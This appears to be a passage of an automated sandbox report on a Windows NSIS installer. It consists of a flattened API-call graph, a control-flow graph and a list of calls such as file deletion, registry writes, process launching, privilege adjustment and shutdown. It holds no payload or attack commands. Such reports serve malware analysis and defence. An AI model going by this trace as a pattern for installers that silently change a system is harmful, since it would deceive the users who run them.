4055a4 24 API calls 3858 401879 3840->3858 3841->3837 3843 403309 44 API calls 3842->3843 3844 4018aa 3843->3844 3845 4018be SetFileTime 3844->3845 3846 4018d0 FindCloseChangeNotification 3844->3846 3845->3846 3848 4018e1 3846->3848 3846->3858 3847->3837 3849 4018e6 3848->3849 3850 4018f9 3848->3850 3851 406579 17 API calls 3849->3851 3852 406579 17 API calls 3850->3852 3854 4018ee lstrcatW 3851->3854 3855 401901 3852->3855 3853->3837 3854->3855 3857 405ba2 MessageBoxIndirectW 3855->3857 3856->3840 3856->3858 3857->3858 3859->3837 3860->3827 3861->3828 4235 401a72 4236 402d1c 17 API calls 4235->4236 4237 401a7b 4236->4237 4238 402d1c 17 API calls 4237->4238 4239 401a20 4238->4239 4240 401573 4241 401583 ShowWindow 4240->4241 4242 40158c 4240->4242 4241->4242 4243 402bc2 4242->4243 4244 40159a ShowWindow 4242->4244 4244->4243 4245 4014f5 SetForegroundWindow 4246 402bc2 4245->4246 4247 401ff6 4248 402d3e 17 API calls 4247->4248 4249 401ffd 4248->4249 4250 40689a 2 API calls 4249->4250 4251 402003 4250->4251 4253 402014 4251->4253 4254 406483 wsprintfW 4251->4254 4254->4253 4255 401b77 4256 402d3e 17 API calls 4255->4256 4257 401b7e 4256->4257 4258 402d1c 17 API calls 4257->4258 4259 401b87 wsprintfW 4258->4259 4260 402bc2 4259->4260 4261 4022f7 4262 402d3e 17 API calls 4261->4262 4263 4022fd 4262->4263 4264 402d3e 17 API calls 4263->4264 4265 402306 4264->4265 4266 402d3e 17 API calls 4265->4266 4267 40230f 4266->4267 4268 40689a 2 API calls 4267->4268 4269 402318 4268->4269 4270 402329 lstrlenW lstrlenW 4269->4270 4271 40231c 4269->4271 4273 4055a4 24 API calls 4270->4273 4272 4055a4 24 API calls 4271->4272 4275 402324 4271->4275 4272->4275 4274 402367 SHFileOperationW 4273->4274 4274->4271 4274->4275 4283 40167b 4284 402d3e 17 API calls 4283->4284 4285 401682 4284->4285 4286 402d3e 17 API calls 4285->4286 4287 40168b 4286->4287 4288 402d3e 17 API calls 4287->4288 4289 401694 MoveFileW 4288->4289 4290 4016a0 4289->4290 4291 4016a7 4289->4291 4292 401423 24 API calls 4290->4292 4293 40689a 2 API calls 4291->4293 4295 4022ee 4291->4295 4292->4295 4294 4016b6 4293->4294 4294->4295 4296 406302 36 API calls 4294->4296 4296->4290 4297 40237b 4298 402382 4297->4298 4302 402395 4297->4302 4299 406579 17 API calls 4298->4299 4300 40238f 4299->4300 4301 405ba2 MessageBoxIndirectW 4300->4301 4301->4302 4303 404eff GetDlgItem GetDlgItem 4304 404f53 7 API calls 4303->4304 4316 40517d 4303->4316 4305 404ff0 SendMessageW 4304->4305 4306 404ffd DeleteObject 4304->4306 4305->4306 4307 405008 4306->4307 4308 40503f 4307->4308 4310 406579 17 API calls 4307->4310 4311 404492 18 API calls 4308->4311 4309 405265 4312 40530e 4309->4312 4318 405170 4309->4318 4323 4052bb SendMessageW 4309->4323 4313 405021 SendMessageW SendMessageW 4310->4313 4317 405053 4311->4317 4314 405323 4312->4314 4315 405317 SendMessageW 4312->4315 4313->4307 4325 405335 ImageList_Destroy 4314->4325 4326 40533c 4314->4326 4334 40534c 4314->4334 4315->4314 4316->4309 4337 4051ef 4316->4337 4357 404e4d SendMessageW 4316->4357 4322 404492 18 API calls 4317->4322 4320 4044f9 8 API calls 4318->4320 4319 405257 SendMessageW 4319->4309 4324 405511 4320->4324 4338 405064 4322->4338 4323->4318 4328 4052d0 SendMessageW 4323->4328 4325->4326 4329 405345 GlobalFree 4326->4329 4326->4334 4327 4054c5 4327->4318 4332 4054d7 ShowWindow GetDlgItem ShowWindow 4327->4332 4331 4052e3 4328->4331 4329->4334 4330 40513f GetWindowLongW SetWindowLongW 4333 405158 4330->4333 4339 4052f4 SendMessageW 4331->4339 4332->4318 4335 405175 4333->4335 4336 40515d ShowWindow 4333->4336 4334->4327 4348 405387 4334->4348 4362 404ecd 4334->4362 4356 4044c7 SendMessageW 4335->4356 4355 4044c7 SendMessageW 4336->4355 4337->4309 4337->4319 4338->4330 4340 40513a 4338->4340 4344 4050b7 SendMessageW 4338->4344 4346 4050f5 SendMessageW 4338->4346 4347 405109 SendMessageW 4338->4347 4339->4312 4340->4330 4340->4333 4341 4053cb 4349 405491 4341->4349 4353 40543f SendMessageW SendMessageW 4341->4353 4344->4338 4346->4338 4347->4338 4348->4341 4351 4053b5 SendMessageW 4348->4351 4350 40549b InvalidateRect 4349->4350 4352 4054a7 4349->4352 4350->4352 4351->4341 4352->4327 4371 404e08 4352->4371 4353->4341 4355->4318 4356->4316 4358 404e70 GetMessagePos ScreenToClient SendMessageW 4357->4358 4359 404eac SendMessageW 4357->4359 4360 404ea9 4358->4360 4361 404ea4 4358->4361 4359->4361 4360->4359 4361->4337 4374 40653c lstrcpynW 4362->4374 4364 404ee0 4375 406483 wsprintfW 4364->4375 4366 404eea 4367 40140b 2 API calls 4366->4367 4368 404ef3 4367->4368 4376 40653c lstrcpynW 4368->4376 4370 404efa 4370->4348 4377 404d3f 4371->4377 4373 404e1d 4373->4327 4374->4364 4375->4366 4376->4370 4378 404d58 4377->4378 4379 406579 17 API calls 4378->4379 4380 404dbc 4379->4380 4381 406579 17 API calls 4380->4381 4382 404dc7 4381->4382 4383 406579 17 API calls 4382->4383 4384 404ddd lstrlenW wsprintfW SetDlgItemTextW 4383->4384 4384->4373 4385 4019ff 4386 402d3e 17 API calls 4385->4386 4387 401a06 4386->4387 4388 402d3e 17 API calls 4387->4388 4389 401a0f 4388->4389 4390 401a16 lstrcmpiW 4389->4390 4391 401a28 lstrcmpW 4389->4391 4392 401a1c 4390->4392 4391->4392 4393 401000 4394 401037 BeginPaint GetClientRect 4393->4394 4395 40100c DefWindowProcW 4393->4395 4397 4010f3 4394->4397 4398 401179 4395->4398 4399 401073 CreateBrushIndirect FillRect DeleteObject 4397->4399 4400 4010fc 4397->4400 4399->4397 4401 401102 CreateFontIndirectW 4400->4401 4402 401167 EndPaint 4400->4402 4401->4402 4403 401112 6 API calls 4401->4403 4402->4398 4403->4402 4404 401d81 4405 401d94 GetDlgItem 4404->4405 4406 401d87 4404->4406 4409 401d8e 4405->4409 4407 402d1c 17 API calls 4406->4407 4407->4409 4408 401dd5 GetClientRect LoadImageW SendMessageW 4412 401e33 4408->4412 4414 401e3f 4408->4414 4409->4408 4410 402d3e 17 API calls 4409->4410 4410->4408 4413 401e38 DeleteObject 4412->4413 4412->4414 4413->4414 4415 404602 lstrlenW 4416 404621 4415->4416 4417 404623 WideCharToMultiByte 4415->4417 4416->4417 4418 402902 4419 402d3e 17 API calls 4418->4419 4420 402909 FindFirstFileW 4419->4420 4421 402931 4420->4421 4422 40291c 4420->4422 4426 406483 wsprintfW 4421->4426 4424 40293a 4427 40653c lstrcpynW 4424->4427 4426->4424 4427->4422 4428 402482 4429 402d3e 17 API calls 4428->4429 4430 402494 4429->4430 4431 402d3e 17 API calls 4430->4431 4432 40249e 4431->4432 4445 402dce 4432->4445 4435 4024d6 4439 402d1c 17 API calls 4435->4439 4442 4024e2 4435->4442 4436 402d3e 17 API calls 4438 4024cc lstrlenW 4436->4438 4437 402925 4438->4435 4439->4442 4440 402501 RegSetValueExW 4441 402517 RegCloseKey 4440->4441 4441->4437 4442->4440 4443 403309 44 API calls 4442->4443 4443->4440 4446 402de9 4445->4446 4449 4063d7 4446->4449 4450 4063e6 4449->4450 4451 4063f1 RegCreateKeyExW 4450->4451 4452 4024ae 4450->4452 4451->4452 4452->4435 4452->4436 4452->4437 4453 401503 4454 40150b 4453->4454 4456 40151e 4453->4456 4455 402d1c 17 API calls 4454->4455 4455->4456 4457 404983 4458 4049c0 4457->4458 4459 4049af 4457->4459 4461 4049cc GetDlgItem 4458->4461 4466 404a2b 4458->4466 4518 405b86 GetDlgItemTextW 4459->4518 4463 4049e0 4461->4463 4462 4049ba 4465 4067eb 5 API calls 4462->4465 4468 4049f4 SetWindowTextW 4463->4468 4473 405ebc 4 API calls 4463->4473 4464 404b0f 4516 404cbe 4464->4516 4520 405b86 GetDlgItemTextW 4464->4520 4465->4458 4466->4464 4470 406579 17 API calls 4466->4470 4466->4516 4471 404492 18 API calls 4468->4471 4469 404b3f 4474 405f19 18 API calls 4469->4474 4475 404a9f SHBrowseForFolderW 4470->4475 4476 404a10 4471->4476 4472 4044f9 8 API calls 4477 404cd2 4472->4477 4478 4049ea 4473->4478 4479 404b45 4474->4479 4475->4464 4480 404ab7 CoTaskMemFree 4475->4480 4481 404492 18 API calls 4476->4481 4478->4468 4482 405e11 3 API calls 4478->4482 4521 40653c lstrcpynW 4479->4521 4483 405e11 3 API calls 4480->4483 4484 404a1e 4481->4484 4482->4468 4485 404ac4 4483->4485 4519 4044c7 SendMessageW 4484->4519 4488 404afb SetDlgItemTextW 4485->4488 4493 406579 17 API calls 4485->4493 4488->4464 4489 404a24 4491 406931 5 API calls 4489->4491 4490 404b5c 4492 406931 5 API calls 4490->4492 4491->4466 4500 404b63 4492->4500 4494 404ae3 lstrcmpiW 4493->4494 4494->4488 4497 404af4 lstrcatW 4494->4497 4495 404ba4 4522 40653c lstrcpynW 4495->4522 4497->4488 4498 404bab 4499 405ebc 4 API calls 4498->4499 4501 404bb1 GetDiskFreeSpaceW 4499->4501 4500->4495 4503 405e5d 2 API calls 4500->4503 4505 404bfc 4500->4505 4504 404bd5 MulDiv 4501->4504 4501->4505 4503->4500 4504->4505 4506 404c6d 4505->4506 4507 404e08 20 API calls 4505->4507 4508 404c90 4506->4508 4509 40140b 2 API calls 4506->4509 4510 404c5a 4507->4510 4523 4044b4 EnableWindow 4508->4523 4509->4508 4512 404c6f SetDlgItemTextW 4510->4512 4513 404c5f 4510->4513 4512->4506 4515 404d3f 20 API calls 4513->4515 4514 404cac 4514->4516 4517 4048dc SendMessageW 4514->4517 4515->4506 4516->4472 4517->4516 4518->4462 4519->4489 4520->4469 4521->4490 4522->4498 4523->4514 3725 401389 3727 401390 3725->3727 3726 4013fe 3727->3726 3728 4013cb MulDiv SendMessageW 3727->3728 3728->3727 4524 402889 4525 402890 4524->4525 4531 402b0d 4524->4531 4526 402d1c 17 API calls 4525->4526 4527 402897 4526->4527 4528 4028a6 SetFilePointer 4527->4528 4529 4028b6 4528->4529 4528->4531 4532 406483 wsprintfW 4529->4532 4532->4531 4533 40190c 4534 401943 4533->4534 4535 402d3e 17 API calls 4534->4535 4536 401948 4535->4536 4537 405c4e 67 API calls 4536->4537 4538 401951 4537->4538 4539 40190f 4540 402d3e 17 API calls 4539->4540 4541 401916 4540->4541 4542 405ba2 MessageBoxIndirectW 4541->4542 4543 40191f 4542->4543 4544 407090 4548 406adf 4544->4548 4545 40744a 4546 406b60 GlobalFree 4547 406b69 GlobalAlloc 4546->4547 4547->4545 4547->4548 4548->4545 4548->4546 4548->4547 4548->4548 4549 406be0 GlobalAlloc 4548->4549 4550 406bd7 GlobalFree 4548->4550 4549->4545 4549->4548 4550->4549 4551 401491 4552 4055a4 24 API calls 4551->4552 4553 401498 4552->4553 3332 401f12 3333 402d3e 17 API calls 3332->3333 3334 401f18 3333->3334 3335 402d3e 17 API calls 3334->3335 3336 401f21 3335->3336 3337 402d3e 17 API calls 3336->3337 3338 401f2a 3337->3338 3339 402d3e 17 API calls 3338->3339 3340 401f33 3339->3340 3341 401423 24 API calls 3340->3341 3342 401f3a 3341->3342 3349 405b68 ShellExecuteExW 3342->3349 3344 401f82 3346 402925 3344->3346 3350 4069dc WaitForSingleObject 3344->3350 3347 401f9f CloseHandle 3347->3346 3349->3344 3351 4069f6 3350->3351 3352 406a08 GetExitCodeProcess 3351->3352 3355 40696d 3351->3355 3352->3347 3356 40698a PeekMessageW 3355->3356 3357 406980 DispatchMessageW 3356->3357 3358 40699a WaitForSingleObject 3356->3358 3357->3356 3358->3351 4561 402614 4562 402d3e 17 API calls 4561->4562 4563 40261b 4562->4563 4566 406032 GetFileAttributesW CreateFileW 4563->4566 4565 402627 4566->4565 4567 402596 4577 402d7e 4567->4577 4570 402d1c 17 API calls 4571 4025a9 4570->4571 4572 4025d1 RegEnumValueW 4571->4572 4573 4025c5 RegEnumKeyW 4571->4573 4575 402925 4571->4575 4574 4025e6 RegCloseKey 4572->4574 4573->4574 4574->4575 4578 402d3e 17 API calls 4577->4578 4579 402d95 4578->4579 4580 4063a9 RegOpenKeyExW 4579->4580 4581 4025a0 4580->4581 4581->4570 4582 401d17 4583 402d1c 17 API calls 4582->4583 4584 401d1d IsWindow 4583->4584 4585 401a20 4584->4585 4586 405518 4587 405528 4586->4587 4588 40553c 4586->4588 4589 40552e 4587->4589 4598 405585 4587->4598 4590 405544 IsWindowVisible 4588->4590 4596 40555b 4588->4596 4592 4044de SendMessageW 4589->4592 4593 405551 4590->4593 4590->4598 4591 40558a CallWindowProcW 4594 405538 4591->4594 4592->4594 4595 404e4d 5 API calls 4593->4595 4595->4596 4596->4591 4597 404ecd 4 API calls 4596->4597 4597->4598 4598->4591 3729 403b19 3730 403b34 3729->3730 3731 403b2a CloseHandle 3729->3731 3732 403b48 3730->3732 3733 403b3e CloseHandle 3730->3733 3731->3730 3738 403b76 3732->3738 3733->3732 3739 403b84 3738->3739 3740 403b4d 3739->3740 3741 403b89 FreeLibrary GlobalFree 3739->3741 3742 405c4e 3740->3742 3741->3740 3741->3741 3743 405f19 18 API calls 3742->3743 3744 405c6e 3743->3744 3745 405c76 DeleteFileW 3744->3745 3746 405c8d 3744->3746 3775 403b59 3745->3775 3747 405dad 3746->3747 3778 40653c lstrcpynW 3746->3778 3754 40689a 2 API calls 3747->3754 3747->3775 3749 405cb3 3750 405cc6 3749->3750 3751 405cb9 lstrcatW 3749->3751 3753 405e5d 2 API calls 3750->3753 3752 405ccc 3751->3752 3755 405cdc lstrcatW 3752->3755 3757 405ce7 lstrlenW FindFirstFileW 3752->3757 3753->3752 3756 405dd2 3754->3756 3755->3757 3758 405e11 3 API calls 3756->3758 3756->3775 3757->3747 3760 405d09 3757->3760 3759 405ddc 3758->3759 3762 405c06 5 API calls 3759->3762 3761 405d90 FindNextFileW 3760->3761 3771 405c4e 60 API calls 3760->3771 3773 4055a4 24 API calls 3760->3773 3776 4055a4 24 API calls 3760->3776 3777 406302 36 API calls 3760->3777 3779 40653c lstrcpynW 3760->3779 3780 405c06 3760->3780 3761->3760 3765 405da6 FindClose 3761->3765 3764 405de8 3762->3764 3766 405e02 3764->3766 3767 405dec 3764->3767 3765->3747 3769 4055a4 24 API calls 3766->3769 3770 4055a4 24 API calls 3767->3770 3767->3775 3769->3775 3772 405df9 3770->3772 3771->3760 3774 406302 36 API calls 3772->3774 3773->3761 3774->3775 3776->3760 3777->3760 3778->3749 3779->3760 3788 40600d GetFileAttributesW 3780->3788 3782 405c33 3782->3760 3784 405c21 RemoveDirectoryW 3786 405c2f 3784->3786 3785 405c29 DeleteFileW 3785->3786 3786->3782 3787 405c3f SetFileAttributesW 3786->3787 3787->3782 3789 405c12 3788->3789 3790 40601f SetFileAttributesW 3788->3790 3789->3782 3789->3784 3789->3785 3790->3789 3791 401b9b 3792 401bec 3791->3792 3793 401ba8 3791->3793 3795 401bf1 3792->3795 3796 401c16 GlobalAlloc 3792->3796 3794 401c31 3793->3794 3799 401bbf 3793->3799 3797 406579 17 API calls 3794->3797 3805 402395 3794->3805 3795->3805 3812 40653c lstrcpynW 3795->3812 3798 406579 17 API calls 3796->3798 3800 40238f 3797->3800 3798->3794 3810 40653c lstrcpynW 3799->3810 3806 405ba2 MessageBoxIndirectW 3800->3806 3803 401c03 GlobalFree 3803->3805 3804 401bce 3811 40653c lstrcpynW 3804->3811 3806->3805 3808 401bdd 3813 40653c lstrcpynW 3808->3813 3810->3804 3811->3808 3812->3803 3813->3805 4606 402b9d SendMessageW 4607 402bb7 InvalidateRect 4606->4607 4608 402bc2 4606->4608 4607->4608 4609 40149e 4610 402395 4609->4610 4611 4014ac PostQuitMessage 4609->4611 4611->4610 4612 402522 4613 402d7e 17 API calls 4612->4613 4614 40252c 4613->4614 4615 402d3e 17 API calls 4614->4615 4616 402535 4615->4616 4617 402540 RegQueryValueExW 4616->4617 4622 402925 4616->4622 4618 402560 4617->4618 4619 402566 RegCloseKey 4617->4619 4618->4619 4623 406483 wsprintfW 4618->4623 4619->4622 4623->4619 4624 4021a2 4625 402d3e 17 API calls 4624->4625 4626 4021a9 4625->4626 4627 402d3e 17 API calls 4626->4627 4628 4021b3 4627->4628 4629 402d3e 17 API calls 4628->4629 4630 4021bd 4629->4630 4631 402d3e 17 API calls 4630->4631 4632 4021c7 4631->4632 4633 402d3e 17 API calls 4632->4633 4635 4021d1 4633->4635 4634 402210 CoCreateInstance 4639 40222f 4634->4639 4635->4634 4636 402d3e 17 API calls 4635->4636 4636->4634 4637 401423 24 API calls 4638 4022ee 4637->4638 4639->4637 4639->4638 4640 4015a3 4641 402d3e 17 API calls 4640->4641 4642 4015aa SetFileAttributesW 4641->4642 4643 4015bc 4642->4643 4644 401fa4 4645 402d3e 17 API calls 4644->4645 4646 401faa 4645->4646 4647 4055a4 24 API calls 4646->4647 4648 401fb4 4647->4648 4649 405b25 2 API calls 4648->4649 4650 401fba 4649->4650 4651 401fdd CloseHandle 4650->4651 4653 4069dc 5 API calls 4650->4653 4654 402925 4650->4654 4651->4654 4655 401fcf 4653->4655 4655->4651 4657 406483 wsprintfW 4655->4657 4657->4651 4665 40202a 4666 402d3e 17 API calls 4665->4666 4667 402031 4666->4667 4668 406931 5 API calls 4667->4668 4669 402040 4668->4669 4670 4020c4 4669->4670 4671 40205c GlobalAlloc 4669->4671 4671->4670 4672 402070 4671->4672 4673 406931 5 API calls 4672->4673 4674 402077 4673->4674 4675 406931 5 API calls 4674->4675 4676 402081 4675->4676 4676->4670 4680 406483 wsprintfW 4676->4680 4678 4020b6 4681 406483 wsprintfW 4678->4681 4680->4678 4681->4670 4682 4023aa 4683 4023b2 4682->4683 4684 4023b8 4682->4684 4685 402d3e 17 API calls 4683->4685 4686 4023c6 4684->4686 4687 402d3e 17 API calls 4684->4687 4685->4684 4688 4023d4 4686->4688 4689 402d3e 17 API calls 4686->4689 4687->4686 4690 402d3e 17 API calls 4688->4690 4689->4688 4691 4023dd WritePrivateProfileStringW 4690->4691 4692 402f2b 4693 402f56 4692->4693 4694 402f3d SetTimer 4692->4694 4695 402fa4 4693->4695 4696 402faa MulDiv 4693->4696 4694->4693 4697 402f64 wsprintfW SetWindowTextW SetDlgItemTextW 4696->4697 4697->4695 4699 40242c 4700 402434 4699->4700 4701 40245f 4699->4701 4702 402d7e 17 API calls 4700->4702 4703 402d3e 17 API calls 4701->4703 4704 40243b 4702->4704 4705 402466 4703->4705 4707 402d3e 17 API calls 4704->4707 4708 402473 4704->4708 4710 402dfc 4705->4710 4709 40244c RegDeleteValueW RegCloseKey 4707->4709 4709->4708 4711 402e10 4710->4711 4713 402e09 4710->4713 4711->4713 4714 402e41 4711->4714 4713->4708 4715 4063a9 RegOpenKeyExW 4714->4715 4716 402e6f 4715->4716 4717 402e7f RegEnumValueW 4716->4717 4721 402ea2 4716->4721 4725 402f19 4716->4725 4718 402f09 RegCloseKey 4717->4718 4717->4721 4718->4725 4719 402ede RegEnumKeyW 4720 402ee7 RegCloseKey 4719->4720 4719->4721 4722 406931 5 API calls 4720->4722 4721->4718 4721->4719 4721->4720 4723 402e41 6 API calls 4721->4723 4724 402ef7 4722->4724 4723->4721 4724->4725 4726 402efb RegDeleteKeyW 4724->4726 4725->4713 4726->4725 4727 401a30 4728 402d3e 17 API calls 4727->4728 4729 401a39 ExpandEnvironmentStringsW 4728->4729 4730 401a4d 4729->4730 4732 401a60 4729->4732 4731 401a52 lstrcmpW 4730->4731 4730->4732 4731->4732 4738 401735 4739 402d3e 17 API calls 4738->4739 4740 40173c SearchPathW 4739->4740 4741 401757 4740->4741 4742 402636 4743 402665 4742->4743 4744 40264a 4742->4744 4745 402695 4743->4745 4746 40266a 4743->4746 4747 402d1c 17 API calls 4744->4747 4749 402d3e 17 API calls 4745->4749 4748 402d3e 17 API calls 4746->4748 4757 402651 4747->4757 4750 402671 4748->4750 4751 40269c lstrlenW 4749->4751 4759 40655e WideCharToMultiByte 4750->4759 4751->4757 4753 402685 lstrlenA 4753->4757 4754 4026df 4755 4026c9 4755->4754 4756 4060e4 WriteFile 4755->4756 4756->4754 4757->4754 4757->4755 4758 406113 5 API calls 4757->4758 4758->4755 4759->4753 4760 401d38 4761 402d1c 17 API calls 4760->4761 4762 401d3f 4761->4762 4763 402d1c 17 API calls 4762->4763 4764 401d4b GetDlgItem 4763->4764 4765 402630 4764->4765 4766 4014b8 4767 4014be 4766->4767 4768 401389 2 API calls 4767->4768 4769 4014c6 4768->4769 4770 403fb9 4771 403fd1 4770->4771 4772 40410c 4770->4772 4771->4772 4773 403fdd 4771->4773 4774 40411d GetDlgItem GetDlgItem 4772->4774 4782 40415d 4772->4782 4775 403fe8 SetWindowPos 4773->4775 4776 403ffb 4773->4776 4777 404492 18 API calls 4774->4777 4775->4776 4779 404000 ShowWindow 4776->4779 4780 404018 4776->4780 4781 404147 SetClassLongW 4777->4781 4778 4044de SendMessageW 4810 4041c9 4778->4810 4779->4780 4785 404020 DestroyWindow 4780->4785 4786 40403a 4780->4786 4787 40140b 2 API calls 4781->4787 4783 4041b7 4782->4783 4788 401389 2 API calls 4782->4788 4783->4778 4784 404107 4783->4784 4789 40441b 4785->4789 4790 404050 4786->4790 4791 40403f SetWindowLongW 4786->4791 4787->4782 4792 40418f 4788->4792 4789->4784 4799 40444c ShowWindow 4789->4799 4796 4040c7 4790->4796 4797 40405c GetDlgItem 4790->4797 4791->4784 4792->4783 4793 404193 SendMessageW 4792->4793 4793->4784 4794 40140b 2 API calls 4794->4810 4795 40441d DestroyWindow EndDialog 4795->4789 4798 4044f9 8 API calls 4796->4798 4800 40408c 4797->4800 4801 40406f SendMessageW IsWindowEnabled 4797->4801 4798->4784 4799->4784 4803 404099 4800->4803 4804 4040e0 SendMessageW 4800->4804 4805 4040ac 4800->4805 4813 404091 4800->4813 4801->4784 4801->4800 4802 406579 17 API calls 4802->4810 4803->4804 4803->4813 4804->4796 4808 4040b4 4805->4808 4809 4040c9 4805->4809 4806 40446b SendMessageW 4806->4796 4807 404492 18 API calls 4807->4810 4811 40140b 2 API calls 4808->4811 4812 40140b 2 API calls 4809->4812 4810->4784 4810->4794 4810->4795 4810->4802 4810->4807 4814 404492 18 API calls 4810->4814 4830 40435d DestroyWindow 4810->4830 4811->4813 4812->4813 4813->4796 4813->4806 4815 404244 GetDlgItem 4814->4815 4816 404261 ShowWindow EnableWindow 4815->4816 4817 404259 4815->4817 4839 4044b4 EnableWindow 4816->4839 4817->4816 4819 40428b EnableWindow 4824 40429f 4819->4824 4820 4042a4 GetSystemMenu EnableMenuItem SendMessageW 4821 4042d4 SendMessageW 4820->4821 4820->4824 4821->4824 4823 403f9a 18 API calls 4823->4824 4824->4820 4824->4823 4840 4044c7 SendMessageW 4824->4840 4841 40653c lstrcpynW 4824->4841 4826 404303 lstrlenW 4827 406579 17 API calls 4826->4827 4828 404319 SetWindowTextW 4827->4828 4829 401389 2 API calls 4828->4829 4829->4810 4830->4789 4831 404377 CreateDialogParamW 4830->4831 4831->4789 4832 4043aa 4831->4832 4833 404492 18 API calls 4832->4833 4834 4043b5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4833->4834 4835 401389 2 API calls 4834->4835 4836 4043fb 4835->4836 4836->4784 4837 404403 ShowWindow 4836->4837 4838 4044de SendMessageW 4837->4838 4838->4789 4839->4819 4840->4824 4841->4826 4842 4028bb 4843 4028c1 4842->4843 4844 402bc2 4843->4844 4845 4028c9 FindClose 4843->4845 4845->4844 4846 40493c 4847 404972 4846->4847 4848 40494c 4846->4848 4850 4044f9 8 API calls 4847->4850 4849 404492 18 API calls 4848->4849 4852 404959 SetDlgItemTextW 4849->4852 4851 40497e 4850->4851 4852->4847

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4035d8-403615 SetErrorMode GetVersion 1 403617-40361f call 406931 0->1 2 403628 0->2 1->2 8 403621 1->8 3 40362d-403641 call 4068c1 lstrlenA 2->3 9 403643-40365f call 406931 * 3 3->9 8->2 16 403670-4036cf #17 OleInitialize SHGetFileInfoW call 40653c GetCommandLineW call 40653c 9->16 17 403661-403667 9->17 24 4036d1-4036d8 16->24 25 4036d9-4036f3 call 405e3e CharNextW 16->25 17->16 22 403669 17->22 22->16 24->25 28 4036f9-4036ff 25->28 29 40380a-403824 GetTempPathW call 4035a7 25->29 31 403701-403706 28->31 32 403708-40370c 28->32 36 403826-403844 GetWindowsDirectoryW lstrcatW call 4035a7 29->36 37 40387c-403896 DeleteFileW call 403068 29->37 31->31 31->32 34 403713-403717 32->34 35 40370e-403712 32->35 38 4037d6-4037e3 call 405e3e 34->38 39 40371d-403723 34->39 35->34 36->37 54 403846-403876 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4035a7 36->54 57 403947-403957 ExitProcess OleUninitialize 37->57 58 40389c-4038a2 37->58 55 4037e5-4037e6 38->55 56 4037e7-4037ed 38->56 43 403725-40372d 39->43 44 40373e-403777 39->44 50 403734 43->50 51 40372f-403732 43->51 45 403794-4037ce 44->45 46 403779-40377e 44->46 45->38 53 4037d0-4037d4 45->53 46->45 52 403780-403788 46->52 50->44 51->44 51->50 61 40378a-40378d 52->61 62 40378f 52->62 53->38 63 4037f5-403803 call 40653c 53->63 54->37 54->57 55->56 56->28 65 4037f3 56->65 59 403a7d-403a83 57->59 60 40395d-40396d call 405ba2 ExitProcess 57->60 66 403937-40393e call 403c0b 58->66 67 4038a8-4038b3 call 405e3e 58->67 69 403b01-403b09 59->69 70 403a85-403a9b GetCurrentProcess OpenProcessToken 59->70 61->45 61->62 62->45 72 403808 63->72 65->72 76 403943 66->76 83 403901-40390b 67->83 84 4038b5-4038ea 67->84 77 403b0b 69->77 78 403b0f-403b13 ExitProcess 69->78 80 403ad1-403adf call 406931 70->80 81 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 70->81 72->29 76->57 77->78 94 403ae1-403aeb 80->94 95 403aed-403af8 ExitWindowsEx 80->95 81->80 87 403973-403987 call 405b0d lstrcatW 83->87 88 40390d-40391b call 405f19 83->88 86 4038ec-4038f0 84->86 90 4038f2-4038f7 86->90 91 4038f9-4038fd 86->91 101 403994-4039ae lstrcatW lstrcmpiW 87->101 102 403989-40398f lstrcatW 87->102 88->57 103 40391d-403933 call 40653c * 2 88->103 90->91 97 4038ff 90->97 91->86 91->97 94->95 96 403afa-403afc call 40140b 94->96 95->69 95->96 96->69 97->83 101->57 105 4039b0-4039b3 101->105 102->101 103->66 107 4039b5-4039ba call 405a73 105->107 108 4039bc call 405af0 105->108 113 4039c1-4039cf SetCurrentDirectoryW 107->113 108->113 116 4039d1-4039d7 call 40653c 113->116 117 4039dc-403a05 call 40653c 113->117 116->117 121 403a0a-403a26 call 406579 DeleteFileW 117->121 124 403a67-403a6f 121->124 125 403a28-403a38 CopyFileW 121->125 124->121 126 403a71-403a78 call 406302 124->126 125->124 127 403a3a-403a5a call 406302 call 406579 call 405b25 125->127 126->57 127->124 136 403a5c-403a63 CloseHandle 127->136 136->124
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 004035FB
                                              • GetVersion.KERNEL32 ref: 00403601
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
                                              • OleInitialize.OLE32(00000000), ref: 00403678
                                              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
                                              • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000007,00000009,0000000B), ref: 004036E1
                                                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
                                              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                                                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                              • ExitProcess.KERNEL32(00000007,?,00000007,00000009,0000000B), ref: 00403947
                                              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
                                              • ExitProcess.KERNEL32 ref: 0040396D
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
